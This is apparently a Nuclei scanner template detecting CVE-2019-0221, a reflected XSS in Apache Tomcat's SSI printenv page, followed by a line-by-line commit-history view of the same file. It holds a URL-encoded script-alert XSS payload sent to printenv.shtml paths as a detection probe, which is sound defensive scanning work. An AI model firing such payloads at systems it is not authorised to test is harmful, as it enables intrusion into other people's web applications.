nuclei-templates/cves/2019/CVE-2019-0221.yaml

id: CVE-2019-0221

info:
  name: Apache Tomcat XSS
  author: pikpikcu
  severity: medium
  description: |
    The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
    7.0.0 to 7.0.93 echoes user provided data without escaping and is,
    therefore, vulnerable to XSS. SSI is disabled by default.
    The printenv command is intended for debugging and is unlikely to be present in a production website.
  reference:
    - https://seclists.org/fulldisclosure/2019/May/50
    - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
    - https://www.exploit-db.com/exploits/50119
    - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-0221
    cwe-id: CWE-79
  tags: cve,cve2019,apache,xss,tomcat

requests:
  - method: GET
    path:
      - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
      - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('xss')</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
📝 CVE-2019-0221 2021-03-05 14:38:39 +00:00			`id: CVE-2019-0221`

			`info:`
			`name: Apache Tomcat XSS`
			`author: pikpikcu`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: medium`
📝 CVE-2019-0221 2021-03-05 14:38:39 +00:00			`description: \|`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and`
			`7.0.0 to 7.0.93 echoes user provided data without escaping and is,`
			`therefore, vulnerable to XSS. SSI is disabled by default.`
			`The printenv command is intended for debugging and is unlikely to be present in a production website.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://seclists.org/fulldisclosure/2019/May/50`
			`- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/`
			`- https://www.exploit-db.com/exploits/50119`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2019-0221`
			`cwe-id: CWE-79`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2019,apache,xss,tomcat`
📝 CVE-2019-0221 2021-03-05 14:38:39 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"`
Update CVE-2019-0221.yaml 2021-08-01 02:43:53 +00:00			`- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"`
📝 CVE-2019-0221 2021-03-05 14:38:39 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: word`
			`words:`
			`- "<script>alert('xss')</script>"`
Update CVE-2019-0221.yaml 2021-03-06 05:58:28 +00:00
			`- type: word`
Apache Tomcat Template improvements (#3446) * Improved Tomcat matchers / extractors / paths * removed duplicate detections / matchers * removed duplicate template * Added missing tomcat tags 2021-12-29 13:40:59 +00:00			`part: header`
Update CVE-2019-0221.yaml 2021-03-06 05:58:28 +00:00			`words:`
			`- "text/html"`
📝 CVE-2019-0221 2021-03-05 14:38:39 +00:00
			`- type: status`
			`status:`
			`- 200`